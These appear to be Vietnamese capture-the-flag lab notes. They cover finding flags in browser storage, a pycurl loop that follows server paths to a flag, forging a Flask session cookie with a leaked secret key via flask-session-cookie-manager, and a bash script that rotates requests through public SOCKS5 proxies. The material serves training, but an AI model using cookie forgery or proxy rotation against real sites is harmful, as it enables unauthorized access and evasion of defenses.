| 4 flag đầu nằm ở trong từng mục của Storage của Application  flag 5 nằm ở mục Console |
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| code python:  import pycurl  from io import BytesIO  server = "10.10.10.10:33314"  x = "/promo"  flag = 0  while flag == 0:  curl = pycurl.Curl()  curl.setopt(curl.URL, server + x)  buffer = BytesIO()  curl.setopt(curl.WRITEDATA, buffer)  curl.perform()    content = buffer.getvalue().decode('utf-8') # Decode bytes to string  curl.close()  print(content)  if "flag" in content: # No need to convert to string here  flag = 1  result = content  else:  x = ""  for i in range(len(content)):  if content[i] == "\"":  for j in range(i + 1, len(content)):  if content[j] == "\"":  break  x += content[j]  break  print(result) |
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| B1: cài tools  link: <https://github.com/noraj/flask-session-cookie-manager.git>  git clone  cd flask-session-cookie-manager/  B2: lấy key  GET <url/app.py>    Cú pháp encode: python3 flask\_session\_cookie\_manager3.py encode -s $secret\_key -t $data    gửi request lên server bằng cookie  curl -X GET "url" --cookie "session=<đoạn mã ở trên>” |
| code:  #!/bin/bash  proxies=("103.130.218.135:32338" "103.97.179.115:1080" "38.242.199.111:47460" "172.105.52.78:31106" "128.199.221.91:2215" "192.111.137.35:4145" "103.180.240.44:1080" "152.69.229.244:13650" "185.66.88.86:57752" "78.128.81.220:31623" "187.188.169.169:59329")  url="https://44deec37-1409-4581-a29d-4af514df4b21.web.lms.itmo.xyz/"  cookies\_file="cookies.txt"  if [ ! -f "$cookies\_file" ]; then  touch "$cookies\_file"  fi  for proxy in "${proxies[@]}"  do  echo "Using proxy $proxy"  curl -s -b "$cookies\_file" -c "$cookies\_file" --socks5 "$proxy" -k "$url"  done  thay url và các địa chỉ IP  <https://spys.one/en/socks-proxy-list/> |